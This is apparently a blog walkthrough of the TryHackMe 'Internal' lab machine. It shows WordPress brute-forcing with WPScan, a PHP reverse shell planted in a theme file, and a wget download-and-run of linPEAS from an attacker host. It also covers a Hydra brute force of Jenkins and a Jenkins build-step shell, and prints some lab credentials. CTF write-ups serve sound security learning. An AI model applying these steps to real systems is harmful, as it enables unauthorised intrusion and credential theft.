Internal – Walkthrough

Disclaimer -> All passwords and flags have been masked due rules to be a official TryHackMe writeup.


URLs for this post

Enumeration

nmap (../scans/_full_tcp_nmap.txt)

As always we check the full tcp scan first and the result is pretty managable.

So what do we have?

  • Port 22 SSH
  • Port 80 Web Server

Operating System: Ubuntu Linux

Software: Apache 2.4.29; OpenSSH 7.6p1

As there´s a web server the gobuster logfile is worth to take a look at.

GoBuster (../scans/tcp_80_http_gobuster.txt)

gobuster

Website

On the Index.html the webserver shows the default web page of Apache. On /blog we get a generic wordpress page. With that in our mind we can use a nice tool to pull out more information out of wordpress sites.

standard wordpress site

WPScan allows us to automatically enumerate the wordpress instance by checking all posts for usernames, plugins, themes and many more.

wpscan --url http://internal.thm/blog -e

we “only” got one user and no other vulnerable plugins

With a username we have the mission to get a password for it. Luckily WPScan comes with a brute force feature. By providing a wordlist we can let it run with the following command.

wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt

#success

Time to log in and check out any interesting posts and where we can put our file for a reverse shell!

got a private post with credentials

The plugins were write protected and i had to take a look at the themes editor. At the running theme we can edit i.e. the file 404.php and plant our code in the there. Source of PHP Code

Reverse Shell Blog

Make sure that you put in your IP and a desired port for the listener.

404.php with the PHP Reverse shell code

Instantly start out listener and visit the page in the browser or via curl.

nc -nlvp 4444

curl http://internal.thm/blog/wp-content/themes/TwentySeventeen/404.php

hello rev shell my old friend

Best practice is to stabilze our shell with python.

#remote
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL^Z to put it in the background
#local
stty raw -echo; fg
#remote
echo TERM=xterm
reset

Now we have auto completion and will not losing our shell by hitting CRTL^C. Because things are going so well we start our local http-server and upload linPEAS for local enumeration and possible privilege escalation vectors. Start the web server in the directory where the files stored which you want to share. Download the script, make ich executable und pipe the output in a log file. So you can take a look at it afterwards.

Tip: less -r will show you the colored output.

#local
sudo python3 -m http.server 80
#remote
wget http://attackerIP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log

Snippets of linpeas.log

/var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'wordpress123' );
define( 'DB_HOST', 'localhost' );
[+] Searching passwords in config PHP files
$pwd    = trim( wp_unslash( $_POST['pwd'] ) );
$dbpass='B2Ud4fEOZmVq';
$dbuser='phpmyadmin';

Unfortunately these credentials won´t help us but as this is a penetration test we put that in our notes. What esle we can write down is that there is another local user on that box.

Snippet of cat /etc/passwd shows us

aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash

After i while i found a text file in /opt

www-data@internal:/opt$ cat wp-save.txt

Bill,
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
aubreanna:[CONFIDENTIAL]

It seems that we found a pair of credentials and we´ll use them instantly with ssh.

ssh aubreanna@internal.thm

Now grad that user flag and check out the rest of the home directory.

home directory of aubreanna

The jenkins.txt tells us “Internal Jenkins service is running on 172.17.0.2:8080” and we can confirm that with the command ss -tulpn

At this point we have to forward the port 8080 from that machine to us with

ssh aubreanna@internal.thm -L 8080:localhost:8080

Now we can access the service on out attacking machine via http://localhost:8080

a wild jenkins appears

Ok, no credentials that we found work. The default username of a jenkins installation is “admin”. So lets capture a login request with burp suite and fire up hydra with the correct http parameters

login request

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -f

hail hydra!

Reverse Shell Docker

After loggin in we can build a new project (Freestyle Project) and plant our command for a reverse shell in the build process.

Add Build step – execute shell

As usual we start our listener nc -nlvp 4444 before we hit the “Build Now”-Button.

works as expected

Privilege Escalation

This part will be a quick one. No Kernel exploit, no sudo misconfiguration or other unpatched binaries. Just a note with credentials what´s still a thing “in the wild”.

jenkins@jenkins:/opt$ cat note.txt

Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.

root:[CONFIDENTIAL]

Thanks for reading and cya!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s